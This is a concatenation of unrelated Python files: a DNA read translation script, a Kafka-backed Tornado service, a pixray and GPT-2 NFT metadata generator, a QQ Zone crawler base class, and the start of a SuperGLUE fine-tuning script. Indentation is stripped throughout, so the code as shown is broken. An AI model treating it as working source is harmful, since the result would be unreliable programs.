:param suboutput_name:
:return:
"""
with open(subinput_name, "r") as in_file:
with open(suboutput_name, 'w+') as out_file:
for num_reads, record in enumerate(SeqIO.parse(in_file, 'fasta')):
counter = 0
rev_comp = record.seq.reverse_complement()
for i in range(0,3):
translation_length = len(record) - (len(record[i:])%3)
forward_pass = record.seq[i:translation_length].translate()
reverse_pass = rev_comp[i:translation_length].translate()
if '*' in forward_pass:
for orf in str(forward_pass).split('*'):
if len(orf) > 30:
write_record(record.id, orf, out_file, counter, 'forward')
counter += 1
else:
write_record(record.id, str(forward_pass), out_file, counter, 'forward')
counter += 1
if '*' in reverse_pass:
for orf in str(reverse_pass).split('*'):
if len(orf) > 30:
write_record(record.id, orf, out_file, counter, 'reverse')
counter += 1
else:
write_record(record.id, str(reverse_pass), out_file, counter, 'reverse')
counter += 1
if num_reads % 250000 == 0 and num_reads > 0:
print('%s reads complete'%num_reads)
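# Worked example of the six-frame translation above (a sketch, not part of the original
# script): for the read ATGGCCTAA, frame 0 of the forward strand translates to "MA*",
# which split('*') breaks into the ORF "MA"; the reverse complement TTAGGCCAT is handled
# the same way in frames 0-2, and only ORFs longer than 30 aa are written by write_record.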
if __name__ == "__main__":
line_count = 0
with open(fastq) as inpt:
for line in inpt:
line_count += 1
print('counting records complete')
twentypercent_split = (line_count / 4) // 5
num_to_terminate = twentypercent_split
subset_files = [open('temp_sub_file%s.fa'%i, 'w+') for i in range(0,5)]
current_file = 0
for num_reads, record in enumerate(SeqIO.parse(open(fastq), 'fastq')):
subset_files[current_file].write(''.join(['>',record.id, '\\n', str(record.seq), '\\n']))
if num_reads > num_to_terminate and current_file < 4:
current_file += 1
num_to_terminate += twentypercent_split
print('%s reads processed'%num_reads)
for subset_file in subset_files:
subset_file.close()
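    # Worked example of the split above (illustrative numbers): a FASTQ with 1,000,000
    # lines holds 250,000 reads, so twentypercent_split = 50,000 and each of the five
    # temp_sub_file*.fa files receives roughly 50,000 reads for parallel translation.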
jobs = [Process(target=process_subfile, args=('temp_sub_file%s.fa'%i, 'temp_prot%s.fa'%i)) for i in range(0,5)]
for job in jobs:
job.start()
for job in jobs:
job.join()
subprocess.call('cat temp_prot0.fa temp_prot1.fa temp_prot2.fa temp_prot3.fa temp_prot4.fa > translated_reads.fa', shell=True)
|
kafka_host.py
|
# -*- UTF-8 -*-
import os
import tornado
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from tornado.web import Application, RequestHandler
from typing import Optional, Awaitable
from programmingalpha import AlphaConfig, AlphaPathLookUp
from programmingalpha.alphaservices.KafkaMPI.kafka_node import AlpahaKafkaNode
#from multiprocessing import Process, Event
import json
from programmingalpha.Utility import getLogger
import threading
import random
import queue
import asyncio
logger = getLogger(__name__)
class AlphaKafkaHost(AlpahaKafkaNode):
def __init__(self,config_file):
super().__init__(config_file)
self.processed={} # Id-value dict data
self.Id_queue_free=queue.Queue()
self.Id_size=1000
[self.Id_queue_free.put(i) for i in range(1000)]
self.Id_set_used=set()
def func_poll():
for result in self.consumer:
Id, data= result["Id"], result["data"]
self.processed[Id].set_result(data)
self.releaseId(Id)
self.poll_thread=threading.Thread(target=func_poll )
self.poll_thread.setDaemon(True)
self.poll_thread.start()
def processCore(self, data):
raise NotImplementedError
def useId(self):
if self.Id_queue_free.empty():
[self.Id_queue_free.put(i) for i in range(self.Id_size, self.Id_size*2)]
self.Id_size*=2
Id=self.Id_queue_free.get()
self.Id_set_used.add(Id)
return Id
def releaseId(self, Id):
self.Id_queue_free.put(Id)
self.Id_set_used.remove(Id)
async def getResult(self, Id):
fu=asyncio.Future()
#fu.set_result
self.processed[Id]=fu
res=await fu
del self.processed[Id]
return res
def create_tornado_app(self):
producer, topic= self.producer, self.topic
useId=self.useId
getResult=self.getResult
class ALphaHandler(RequestHandler):
            @tornado.gen.coroutine
            def post(self):
                query_argument = json.loads(self.request.body)
                Id = useId()
                value = {"Id": Id, "data": query_argument}
                # push the request to kafka, then wait for the matching result
                producer.send(topic=topic, value=value)
                result = yield getResult(Id)
                self.set_header('Content-type', 'application/json')
                self.write(result)
def get(self):
self.post()
app = Application([
(r"/methodCore", ALphaHandler)
])
return app
def start(self):
app=self.create_tornado_app()
http_server = HTTPServer(app)
http_server.listen(port=self.args.port, address=self.args.listen_ip)
logger.info("\n*************{} service is running({}:{})*************\n".format(self.args.ServiceName, self.args.listen_ip, self.args.port))
IOLoop.current().start()
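# Hedged usage sketch (not part of the original file; the config path is illustrative):
#     host = AlphaKafkaHost("config/service.json")
#     host.start()  # serves POST /methodCore, publishes requests to kafka and awaits results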
|
3words_run.py
|
import argparse
import boto3
from git import Repo
from git import Git
import threading
import os
import pixray
import json
from transformers import GPT2LMHeadModel, GPT2TokenizerFast
from sh import git
import numpy as np
device = 'cuda'
model_id = 'gpt2'
def perplexity(prompt):
model = GPT2LMHeadModel.from_pretrained(model_id).to(device)
tokenizer = GPT2TokenizerFast.from_pretrained(model_id)
tokens_tensor = tokenizer.encode(prompt, add_special_tokens=False, return_tensors="pt")
loss=model(tokens_tensor.to(device), labels=tokens_tensor.to(device))[0]
return np.exp(loss.cpu().detach().numpy())
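# Note on perplexity() above (descriptive, added for clarity): the model call returns the
# mean token cross-entropy loss over the prompt, so np.exp(loss) is the standard
# perplexity PPL = exp((1/N) * sum_i -log p(x_i | x_<i)); lower values mean GPT-2 finds
# the three-word phrase more predictable.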
def metadata_helper(tokenID, prompt, num_rerolls, num_inplace):
#get ssh get out of ssm
#get the private key for the backend datastore
#ssm = boto3.client('ssm')
#parameter = ssm.get_parameter(Name='/github/id_rsa')
#backend_private_key = parameter['Parameter']['Value']
score = perplexity(prompt[0] + ' ' + prompt[1] + ' ' + prompt[2])
#create and upload the metadata
metadata = {"description": "3words Metadata Standard v1",
"external_url": "https://3wordsproject.com",
"image": "https://duncanswilson.github.io/3words-pixray/image/{}.png".format(tokenID),
"name": prompt,
"attributes":[
{"trait_type":"perplexity","value": str(score)},
{"trait_type":"phraseId","value": "blah blah"},
{"trait_type":"word1","value": prompt[0]},
{"trait_type":"word2","value": prompt[1]},
{"trait_type":"word3","value": prompt[2]},
{"trait_type":"generation","value": '{}.{}'.format(num_rerolls, num_inplace)}]}
os.system("cp metadata/{}.json metadata-history/metadata{}-{}-{}.json".format(args.tokenID, args.tokenID, num_rerolls, num_inplace))
with open('{}.json'.format(tokenID), "wt") as f:
json.dump(metadata, f)
#os.system("git add {}.json".format(tokenID))
#os.system("git commit -m 'add the metadata for {} generation {}.{}'".format(tokenID, num_rerolls, num_inplace))
#os.system("git push origin master")
parser = argparse.ArgumentParser(description='blah')
parser.add_argument("--tokenID", type=int, help="")
parser.add_argument("--word1", type=str, help="")
parser.add_argument("--word2", type=str, help="")
parser.add_argument("--word3", type=str, help="")
parser.add_argument("--num_rerolls", type=str, help="")
parser.add_argument("--num_inplace", type=str, help="")
args = parser.parse_args()
#s3 = boto3.client('s3', region_name='us-east-1')
#s3.download_file('reroll-app', 'queue.json', 'queue.json')
#s3.download_file('reroll-app', 'reroll_log.json', 'reroll_log.json')
#reroll_log = json.load(open("reroll_log.json", "rt"))
#os.system("wget https://reroll-app.s3.amazonaws.com/reroll_log.json")
#reroll_log = json.loads(open('reroll_log.json').read())
#import pdb; pdb.set_trace()
#num_rerolls = len(reroll_log[str(args.tokenID)])
#num_inplace = 0
#for reroll in reroll_log[str(args.tokenID)]:
# if reroll['_word1'] == args.word1 and reroll['_word2'] == args.word2 and reroll['_word3'] == args.word3:
# if reroll['inPlace']:
# num_inplace +=1
#move the old image to the backup folder
os.system("cp image/{}.png image-history/{}-{}-{}.png".format(args.tokenID, args.tokenID, args.num_rerolls, args.num_inplace))
#os.system("git add image-history/{}-{}-{}.png".format( args.tokenID, num_rerolls, num_inplace))
#os.system("git commit -m 'adding new history of tokenID {}'".format(args.tokenID))
#os.system("push -u origin master")
print("---> Kicking off Metadata Helper Func")
#in a subprocess kick off metadata_helper
prompt =[]
prompt.append(args.word1)
prompt.append(args.word2)
prompt.append(args.word3)
th = threading.Thread(target=metadata_helper, args=(args.tokenID, prompt, args.num_rerolls, args.num_inplace))
th.start()
pixray.reset_settings()
pixray.add_settings(quality="better", scale=2.5, aspect='square')
real_prompt = "a clear image of " + prompt[0] + ' ' + prompt[1] + ' ' + prompt[2] + ". #pixelart"
pixray.add_settings(prompts=real_prompt)
pixray.add_settings(drawer='pixel')
pixray.add_settings(output= (str(args.tokenID)+".png"))
settings = pixray.apply_settings()
pixray.do_init(settings)
run_complete = False
while not run_complete:
run_complete = pixray.do_run(settings, return_display=True)
#temp_copy = create_temporary_copy(settings.output)
#yield pathlib.Path(os.path.realpath(temp_copy))
#os.system("cp {}.png image/{}.png".format(tokenID, tokenID))
#os.system("git add image/{}.png".format(tokenID))
#os.system("git commit -m 'adding iteration {} of tokenID {}'".format(counter, tokenID))
#os.system("git push origin master")
|
BaseSpider.py
|
import datetime
import requests
from src.threadPool.ImageThreadPool import ImageThreadPool
from src.util import util
from copy import deepcopy
import json
from src.util.constant import BASE_DIR, EXPIRE_TIME_IN_SECONDS, BASE_PATH, QR_CODE_MAP_KEY
import re
import logging
from src.web.entity.UserInfo import UserInfo
from src.web.web_util.web_util import get_redis_conn
import matplotlib.pyplot as plt
import threading
import random
from PIL import Image
class BaseSpider(object):
"""
    Base class that initializes the tools and methods used by the crawler.
"""
def __init__(self, use_redis=False, debug=False, mood_begin=0, mood_num=-1, stop_time='-1',
download_small_image=False, download_big_image=False,
download_mood_detail=True, download_like_detail=True, download_like_names=True, recover=False,
cookie_text=None, from_web=False, username='', nickname='', no_delete=True, pool_flag='127.0.0.1', from_client=False, get_visit=False):
        # Initialize the download options
self.req = requests.Session()
self.mood_begin = mood_begin
self.mood_num = mood_num
self.recover = recover
self.download_small_image = download_small_image
self.download_big_image = download_big_image
self.download_mood_detail = download_mood_detail
self.download_like_detail = download_like_detail
self.download_like_names = download_like_names
        # Controls the number of threads, both for fetching moods and for fetching friend data; the default of 10 means each of the two subtasks starts 10 threads
self.thread_num = 10
self.thread_list = []
self.from_client = from_client
self.no_delete = no_delete
if stop_time != '-1':
self.stop_time = util.get_mktime(stop_time)
else:
self.stop_time = -1
self.begin_time = datetime.datetime.now()
self.host = 'https://user.qzone.qq.com'
self.h5_host = 'h5.qzone.qq.com'
self.http_host = 'http://user.qzone.qq.com'
self.use_redis = use_redis
self.debug = debug
self.cookie_text = cookie_text
self.pool_flag = pool_flag
self.from_web = from_web
self.random_qr_name = str(random.random())
self.get_visit = get_visit
self.QR_CODE_PATH = BASE_PATH + '/src/web/static/image/qr' + self.random_qr_name
self.headers = {
'host': 'user.qzone.qq.com',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'zh-CN,zh;q=0.8',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:66.0) Gecko/20100101 Firefox/66.0',
'connection': 'keep-alive'
}
self.h5_headers = deepcopy(self.headers)
self.h5_headers['host'] = self.h5_host
self.visit_list = []
if use_redis:
self.re = self.connect_redis()
if not from_web and not from_client:
self.username, self.password, self.nickname = self.get_username_password()
else:
self.username = username
self.nickname = nickname
            # Save the user's QR code name so it can be passed to the front end
if self.use_redis:
self.re.hset(QR_CODE_MAP_KEY, self.username, self.random_qr_name)
self.init_user_info()
self.image_thread_pool = ImageThreadPool(20)
def init_user_info(self):
self.init_file_name()
self.mood_host = self.http_host + '/' + self.username + '/mood/'
        # username changes to the friend's QQ number while crawling friends' moods, so keep a backup here
self.raw_username = deepcopy(self.username)
self.raw_nickname = deepcopy(self.nickname)
self.user_info = UserInfo(self.username).load()
if self.user_info is None:
self.user_info = UserInfo(self.username)
self.user_info.QQ = self.username
self.user_info.nickname = self.nickname
def get_username_password(self):
config_path = BASE_DIR + 'config/userinfo.json'
try:
with open(config_path, 'r', encoding='utf-8') as r:
userinfo = json.load(r)
return userinfo['username'], userinfo['password'], userinfo['nick_name']
except:
print("Error: File Not Found==============")
print("请检查配置文件是否正确配置!!!!")
print("Please check config file")
print("Path:", config_path)
exit(1)
    # Convert the response string into standard JSON
def get_json(self, str1):
arr = re.findall(r'[^()]+', str1)
# for i in range(1, len(arr) - 1):
# json += arr[i]
json = "".join(arr[1:-1])
return json.strip()
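    # Worked example for get_json (illustrative): a JSONP-style response such as
    #     _Callback({"code": 0, "data": []});
    # is split on parentheses into ['_Callback', '{"code": 0, "data": []}', ';'], and
    # joining arr[1:-1] keeps only the inner JSON text '{"code": 0, "data": []}'.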
    # Recover data from local storage (used to resume after the crawler was interrupted unexpectedly)
def do_recover_from_exist_data(self):
if self.use_redis:
try:
self.content = json.loads(self.re.get(self.CONTENT_FILE_NAME))
self.like_list_names = json.loads(self.re.get(self.LIKE_LIST_NAME_FILE_NAME))
self.mood_details = json.loads(self.re.get(self.MOOD_DETAIL_FILE_NAME))
self.like_detail = json.loads(self.re.get(self.LIKE_DETAIL_FILE_NAME))
if self.debug:
                    print('Finished recovering data from redis:')
print('content:', len(self.content))
print('like_list_names:', len(self.like_list_names))
print('mood_details:', len(self.mood_details))
print('like_detail:', len(self.like_detail))
return len(self.like_list_names)
except BaseException as e:
self.format_error(e, 'Failed to recover data from redis')
print('Now, try to recover data from json files...')
self.load_all_data_from_json()
else:
self.load_all_data_from_json()
def format_error(self, e, msg=""):
if not self.from_client:
print('ERROR===================')
if self.debug:
print(e)
print(msg)
try:
self.logging.exception(msg=e)
self.logging.error(msg)
except:
pass
print('ERROR===================')
if self.debug:
# raise e
pass
def logging_info(self, info):
self.logging.info(info)
def init_parameter(self):
self.mood_count = 0
self.like_detail = []
self.like_list_names = []
self.content = []
self.unikeys = []
self.tid = ""
self.mood_details = []
self.error_like_detail_unikeys = []
self.error_like_list_unikeys = []
self.error_mood_unikeys = []
self.error_like_detail = {}
self.error_like_list = {}
self.error_mood = {}
self.until_stop_time = True
def init_log(self):
filelog = True
logging_dir = self.USER_BASE_DIR + 'log/'
if self.debug:
print("logging_dir:", logging_dir)
util.check_dir_exist(logging_dir)
# logging.basicConfig(level=logging.INFO,
# format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',
# datefmt='%a, %d %b %Y %H:%M:%S',
# filename=logging_dir + self.username + '.log',
# filemode='w+')
log_path = logging_dir + self.username + '.log'
logger = logging.getLogger('log')
logger.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s')
if filelog:
fh = logging.FileHandler(log_path, encoding='utf-8')
fh.setLevel(logging.DEBUG)
fh.setFormatter(formatter)
logger.addHandler(fh)
return logger
def init_file_name(self):
"""
        Initialize all file names.
:return:
"""
self.USER_BASE_DIR = BASE_DIR + self.username + '/'
self.logging = self.init_log()
self.logging.info('file_name_head:' + self.username)
DATA_DIR_HEAD = self.USER_BASE_DIR + 'data/'
self.CONTENT_FILE_NAME = DATA_DIR_HEAD + 'QQ_content.json'
self.LIKE_DETAIL_FILE_NAME = DATA_DIR_HEAD + 'QQ_like_detail' + '.json'
self.LIKE_LIST_NAME_FILE_NAME = DATA_DIR_HEAD + 'QQ_like_list_name' + '.json'
self.MOOD_DETAIL_FILE_NAME = DATA_DIR_HEAD + 'QQ_mood_detail' + '.json'
ERROR_DIR_HEAD = self.USER_BASE_DIR + 'error/'
self.ERROR_LIKE_DETAIL_FILE_NAME = ERROR_DIR_HEAD + 'QQ_like_detail_error' + '.json'
self.ERROR_LIKE_LIST_NAME_FILE_NAME = ERROR_DIR_HEAD + 'QQ_like_list_name_error' + '.json'
self.ERROR_MOOD_DETAIL_FILE_NAME = ERROR_DIR_HEAD + 'QQ_mood_detail_error' + '.json'
self.ERROR_LIKE_DETAIL_UNIKEY_FILE_NAME = ERROR_DIR_HEAD + 'QQ_like_detail_error_unikey' + '.txt'
self.ERROR_LIKE_LIST_NAME_UNIKEY_FILE_NAME = ERROR_DIR_HEAD + 'QQ_like_list_error_unikey' + '.txt'
self.ERROR_MOOD_DETAIL_UNIKEY_FILE_NAME = ERROR_DIR_HEAD + 'QQ_mood_detail_error_unikey' + '.txt'
self.SMALL_IMAGE_DIR = self.USER_BASE_DIR + 'qq_image/'
self.BIG_IMAGE_DIR = self.USER_BASE_DIR + 'qq_big_image/'
util.check_dir_exist(DATA_DIR_HEAD)
util.check_dir_exist(ERROR_DIR_HEAD)
util.check_dir_exist(self.SMALL_IMAGE_DIR)
util.check_dir_exist(self.BIG_IMAGE_DIR)
USER_BASE_DIR = BASE_DIR + self.username + '/'
util.check_dir_exist(USER_BASE_DIR)
FRIEND_DIR_HEAD = USER_BASE_DIR + 'friend/'
self.FRIEND_LIST_FILE_NAME = FRIEND_DIR_HEAD + 'friend_list.json'
self.FRIEND_DETAIL_FILE_NAME = FRIEND_DIR_HEAD + 'friend_detail.json'
self.FRIEND_DETAIL_LIST_FILE_NAME = FRIEND_DIR_HEAD + 'friend_detail_list.csv'
self.FRIEND_DETAIL_EXCEL_FILE_NAME = FRIEND_DIR_HEAD + 'friend_detail_list.xlsx'
        # Avatars are downloaded into the web static folder so the web app can reference them
self.FRIEND_HEADER_IMAGE_PATH = BASE_PATH + '/src/web/static/image/' + self.username + '/header/'
self.web_image_bash_path = BASE_PATH + '/src/web/static/image/'+ self.username + '/'
util.check_dir_exist(USER_BASE_DIR + 'friend/')
util.check_dir_exist(self.FRIEND_HEADER_IMAGE_PATH)
self.init_analysis_path()
if self.debug:
print("Init file Name Finish:", self.USER_BASE_DIR)
def init_analysis_path(self):
self.friend_dir = BASE_DIR + self.username + '/friend/' + 'friend_detail_list.csv'
self.history_like_agree_file_name = BASE_DIR + self.username + '/friend/' + 'history_like_list.json'
RESULT_BASE_DIR = self.USER_BASE_DIR + "data/result/"
self.MOOD_DATA_FILE_NAME = RESULT_BASE_DIR + 'mood_data.csv'
self.MOOD_DATA_EXCEL_FILE_NAME = RESULT_BASE_DIR + 'mood_data.xlsx'
LABEL_BASE_DIR = self.USER_BASE_DIR + "data/label/"
self.LABEL_FILE_CSV = LABEL_BASE_DIR + 'label_data.csv'
self.LABEL_FILE_EXCEL = LABEL_BASE_DIR + 'label_data.xlsx'
self.label_path = self.USER_BASE_DIR + 'data/label/'
self.image_path = self.USER_BASE_DIR + 'image/'
util.check_dir_exist(RESULT_BASE_DIR)
util.check_dir_exist(LABEL_BASE_DIR)
util.check_dir_exist(self.label_path)
util.check_dir_exist(self.image_path)
def load_all_data_from_json(self):
self.content = self.load_data_from_json(self.CONTENT_FILE_NAME)
self.like_list_names = self.load_data_from_json(self.LIKE_LIST_NAME_FILE_NAME)
self.mood_details = self.load_data_from_json(self.MOOD_DETAIL_FILE_NAME)
self.like_detail = self.load_data_from_json(self.LIKE_DETAIL_FILE_NAME)
print("Success to Load Data From Json")
def load_data_from_json(self, file_name):
try:
with open(file_name, encoding='utf-8') as content:
data = json.load(content)
return data
except BaseException as e:
self.format_error(e, 'Failed to load data ' + file_name)
def delete_cache(self):
self.re.delete(self.LIKE_LIST_NAME_FILE_NAME)
self.re.delete(self.MOOD_DETAIL_FILE_NAME)
self.re.delete(self.LIKE_DETAIL_FILE_NAME)
def save_data_to_redis(self, final_result=False):
"""
        Save data to redis.
        :param final_result: whether this is the final result; if so, error info is saved as well, otherwise the data is only cached
:return:
"""
try:
if self.use_redis:
self.re.set(self.CONTENT_FILE_NAME, json.dumps(self.content, ensure_ascii=False))
if self.download_like_names:
self.re.set(self.LIKE_LIST_NAME_FILE_NAME,
json.dumps(self.like_list_names, ensure_ascii=False))
if self.download_mood_detail:
self.re.set(self.MOOD_DETAIL_FILE_NAME,
json.dumps(self.mood_details, ensure_ascii=False))
if self.download_like_detail:
self.re.set(self.LIKE_DETAIL_FILE_NAME,
json.dumps(self.like_detail, ensure_ascii=False))
if not self.no_delete:
self.re.expire(self.LIKE_LIST_NAME_FILE_NAME, EXPIRE_TIME_IN_SECONDS)
self.re.expire(self.MOOD_DETAIL_FILE_NAME, EXPIRE_TIME_IN_SECONDS)
self.re.expire(self.LIKE_DETAIL_FILE_NAME, EXPIRE_TIME_IN_SECONDS)
if final_result:
if self.download_like_detail:
self.re.set(self.ERROR_LIKE_DETAIL_FILE_NAME,
json.dumps(self.error_like_detail, ensure_ascii=False))
self.re.set(self.ERROR_LIKE_DETAIL_UNIKEY_FILE_NAME, "==".join(self.error_like_detail_unikeys))
if self.download_like_names:
self.re.set(self.ERROR_LIKE_LIST_NAME_FILE_NAME,
json.dumps(self.error_like_list, ensure_ascii=False))
self.re.set(self.ERROR_LIKE_LIST_NAME_UNIKEY_FILE_NAME, "==".join(self.error_like_list_unikeys))
if self.download_mood_detail:
self.re.set(self.ERROR_MOOD_DETAIL_FILE_NAME,
json.dumps(self.error_mood, ensure_ascii=False))
self.re.set(self.ERROR_MOOD_DETAIL_UNIKEY_FILE_NAME, "==".join(self.error_mood_unikeys))
if not self.no_delete:
self.re.expire(self.ERROR_LIKE_DETAIL_FILE_NAME, EXPIRE_TIME_IN_SECONDS)
self.re.expire(self.ERROR_LIKE_DETAIL_UNIKEY_FILE_NAME, EXPIRE_TIME_IN_SECONDS)
self.re.expire(self.ERROR_LIKE_LIST_NAME_FILE_NAME, EXPIRE_TIME_IN_SECONDS)
self.re.expire(self.ERROR_LIKE_LIST_NAME_UNIKEY_FILE_NAME, EXPIRE_TIME_IN_SECONDS)
self.re.expire(self.ERROR_MOOD_DETAIL_FILE_NAME, EXPIRE_TIME_IN_SECONDS)
self.re.expire(self.ERROR_MOOD_DETAIL_UNIKEY_FILE_NAME, EXPIRE_TIME_IN_SECONDS)
except BaseException as e:
            self.format_error(e, 'Failed to save data in redis')
def save_data_to_json(self, data, file_name):
try:
with open(file_name, 'w', encoding='utf-8') as w2:
json.dump(data, w2, ensure_ascii=False)
except BaseException as e:
self.format_error(e, 'Failed to save file:' + file_name)
def save_data_to_txt(self, data, file_name):
try:
with open(file_name, 'w', encoding='utf-8') as w:
w.write(";".join(data))
except BaseException as e:
self.format_error(e, 'Failed to save file:' + file_name)
def save_all_data_to_json(self):
self.save_data_to_json(data=self.content, file_name=self.CONTENT_FILE_NAME)
if self.download_mood_detail:
self.save_data_to_json(data=self.mood_details, file_name=self.MOOD_DETAIL_FILE_NAME)
self.save_data_to_json(data=self.error_mood, file_name=self.ERROR_MOOD_DETAIL_FILE_NAME)
self.save_data_to_txt(data=self.error_mood_unikeys, file_name=self.ERROR_MOOD_DETAIL_UNIKEY_FILE_NAME)
if self.download_like_names:
self.save_data_to_json(data=self.like_detail, file_name=self.LIKE_DETAIL_FILE_NAME)
self.save_data_to_json(data=self.error_like_detail, file_name=self.ERROR_LIKE_DETAIL_FILE_NAME)
            self.save_data_to_txt(data=self.error_like_detail_unikeys, file_name=self.ERROR_LIKE_DETAIL_UNIKEY_FILE_NAME)
if self.download_like_detail:
self.save_data_to_json(data=self.like_list_names, file_name=self.LIKE_LIST_NAME_FILE_NAME)
self.save_data_to_json(data=self.error_like_list, file_name=self.ERROR_LIKE_LIST_NAME_FILE_NAME)
self.save_data_to_txt(data=self.error_like_list_unikeys,
file_name=self.ERROR_LIKE_LIST_NAME_UNIKEY_FILE_NAME)
def connect_redis(self):
conn = get_redis_conn(self.pool_flag)
if conn is None:
print("连接数据库失败")
exit(1)
else:
return conn
def check_time(self, mood, stop_time, until_stop_time=True):
create_time = mood['created_time']
if self.debug:
print('time:', create_time, stop_time)
if stop_time >= create_time:
until_stop_time = False
            print('Reached the configured stop time, the crawler will exit soon')
return until_stop_time
else:
return until_stop_time
def check_comment_num(self, mood):
cmt_num = mood['cmtnum']
if cmt_num > 20:
return cmt_num
else:
return -1
def download_image(self, url, name):
image_url = url
try:
r = self.req.get(url=image_url, headers=self.headers, timeout=20)
image_content = r.content
            # Save the image asynchronously to improve efficiency
# t = threading.Thread(target=self.save_image_concurrent, args=(image_content, name))
# t.start()
thread = self.image_thread_pool.get_thread()
t = thread(target=self.save_image_concurrent, args=(image_content, name))
t.start()
# t = self.image_thread_pool2.submit(self.save_image_concurrent, (image_content, name))
except BaseException as e:
self.format_error(e, 'Failed to download image:' + name)
def save_image_concurrent(self, image, name):
try:
file_image = open(name + '.jpg', 'wb+')
file_image.write(image)
file_image.close()
self.image_thread_pool.add_thread()
except BaseException as e:
self.format_error(e, "Failed to save image:" + name)
def save_image_single(self, image, name):
try:
file_image = open(name + '.jpg', 'wb+')
file_image.write(image)
file_image.close()
except BaseException as e:
self.format_error(e, "Failed to save image:" + name)
def show_image(self, file_path):
t = threading.Thread(target=self.do_show_image, args=(file_path,))
t.start()
def do_show_image(self, file_path):
# image = mpimg.imread(file_path)
image = Image.open(file_path)
plt.imshow(image)
plt.axis('off')
plt.show()
def result_report(self):
print("#######################")
        print('Crawled user:', self.username)
        print('Total time:', (datetime.datetime.now() - self.begin_time).seconds / 60, 'minutes')
        print('Number of QZone mood records:', len(self.mood_details))
        print('Final number of failed items:')
        print('--------------')
        print('Moods:', len(self.error_mood_unikeys))
        print('Like details (including view counts):', len(self.error_like_detail_unikeys))
        print('Like name lists:', len(self.error_like_list_unikeys))
print('--------------')
print("########################")
|
run_superglue.py
|
# coding=utf-8
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
#
# All the modifications on top of
# https://github.com/W4ngatang/transformers/blob/superglue/examples/run_superglue.py
# are under the MIT license by Microsoft.
#
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Finetuning the library models for sequence classification on SuperGLUE (Bert, XLM, XLNet, RoBERTa, Albert, XLM-RoBERTa)."""
""" This is based on Alex Wang's transformers repository, superglue branch. https://github.com/W4ngatang/transformers
https://github.com/W4ngatang/transformers/blob/superglue/examples/run_superglue.py """
import sys
import argparse
import glob
import json
import logging
import os
import random
import time
from queue import PriorityQueue
from heapq import heappush, heappop
import numpy as np
import torch
from torch.utils.data import DataLoader, RandomSampler, SequentialSampler, TensorDataset
from torch.utils.data.distributed import DistributedSampler
from torch._utils import ExceptionWrapper
from multiprocessing import Process, Queue
from tqdm import tqdm
from torch.nn import MSELoss, CosineSimilarity
from transformers import superglue_compute_metrics as compute_metrics
from transformers import superglue_convert_examples_to_features as convert_examples_to_features
from transformers import superglue_output_modes as output_modes
from transformers import superglue_processors as processors
from transformers import superglue_tasks_metrics as task_metrics
from transformers import superglue_tasks_num_spans as task_spans
from transformers import ( # AlbertForSequenceClassification,; AlbertTokenizer,; DistilBertForSequenceClassification,; DistilBertTokenizer,; FlaubertForSequenceClassification,; FlaubertTokenizer,; XLMForSequenceClassification,; XLMRobertaForSequenceClassification,; XLMRobertaTokenizer,; XLMTokenizer,; XLNetForSequenceClassification,; XLNetTokenizer,
WEIGHTS_NAME,
AdamW,
AlbertConfig,
BertConfig,
BertForSequenceClassification,
BertForSpanClassification,
BertTokenizer,
DistilBertConfig,
FlaubertConfig,
RobertaConfig,
RobertaForSequenceClassification,
RobertaForSpanClassification,
RobertaTokenizer,
XLMConfig,
XLMRobertaConfig,
XLNetConfig,
get_linear_schedule_with_warmup,
)
logger = logging.getLogger(__name__)
ALL_MODELS = sum(
(
tuple(conf.pretrained_config_archive_map.keys())
for conf in (
BertConfig,
XLNetConfig,
XLMConfig,
RobertaConfig,
DistilBertConfig,
AlbertConfig,
XLMRobertaConfig,
FlaubertConfig,
)
),
(),
)
MODEL_CLASSES = {
# "bert": (BertConfig, BertForSequenceClassification, BertTokenizer),
# "xlnet": (XLNetConfig, XLNetForSequenceClassification, XLNetTokenizer),
# "xlm": (XLMConfig, XLMForSequenceClassification, XLMTokenizer),
# "roberta": (RobertaConfig, RobertaForSequenceClassification, RobertaTokenizer),
# "distilbert": (DistilBertConfig, DistilBertForSequenceClassification, DistilBertTokenizer),
# "albert": (AlbertConfig, AlbertForSequenceClassification, AlbertTokenizer),
# "xlmroberta": (XLMRobertaConfig, XLMRobertaForSequenceClassification, XLMRobertaTokenizer),
# "flaubert": (FlaubertConfig, FlaubertForSequenceClassification, FlaubertTokenizer),
"bert": (
BertConfig,
BertTokenizer,
{"classification": BertForSequenceClassification, "span_classification": BertForSpanClassification},
),
"roberta": (
RobertaConfig,
RobertaTokenizer,
{"classification": RobertaForSequenceClassification, "span_classification": RobertaForSpanClassification},
),
}
TASK2FILENAME = {
"boolq": "BoolQ.jsonl",
"cb": "CB.jsonl",
"copa": "COPA.jsonl",
"multirc": "MultiRC.jsonl",
"record": "ReCoRD.jsonl",
"rte": "RTE.jsonl",
"wic": "WiC.jsonl",
"wsc": "WSC.jsonl",
}
def set_seed(args):
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.n_gpu > 0:
torch.cuda.manual_seed_all(args.seed)
def train(args, train_dataset, model, tokenizer):
""" Train the model """
args.train_batch_size = args.per_gpu_train_batch_size * max(1, args.n_gpu)
train_sampler = RandomSampler(train_dataset) if args.local_rank == -1 else DistributedSampler(train_dataset)
train_dataloader = DataLoader(train_dataset, sampler=train_sampler, batch_size=args.train_batch_size)
if args.max_steps > 0:
t_total = args.max_steps
args.num_train_epochs = args.max_steps // (len(train_dataloader) // args.gradient_accumulation_steps) + 1
else: # number of training steps = number of epochs * number of batches
t_total = len(train_dataloader) // args.gradient_accumulation_steps * args.num_train_epochs
